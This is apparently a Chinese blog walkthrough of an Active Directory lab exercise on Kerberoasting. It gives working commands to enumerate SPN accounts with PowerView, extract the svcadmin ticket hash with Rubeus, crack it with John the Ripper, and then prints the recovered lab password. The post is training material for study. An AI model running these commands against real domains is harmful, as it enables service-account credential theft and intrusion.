Objective 14

任务

使用kerberoast攻击 破解密码找到SQL Server 服务账户

 

找出以用户帐户运行的服务以及以机器帐户运行的服务

. C:\AD\Tools\PowerView.ps1
Get-DomainUser -SPN

屏幕截图 2024-09-07 214538

 

使用Rubeus得到svcadmin account的hash

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt

删除hashes.txt的:1433

屏幕截图 2024-09-07 214021

 

用john爆破密码

C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt

*ThisisBlasphemyThisisMadness!!

屏幕截图 2024-09-07 214802

 

© 版权声明
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片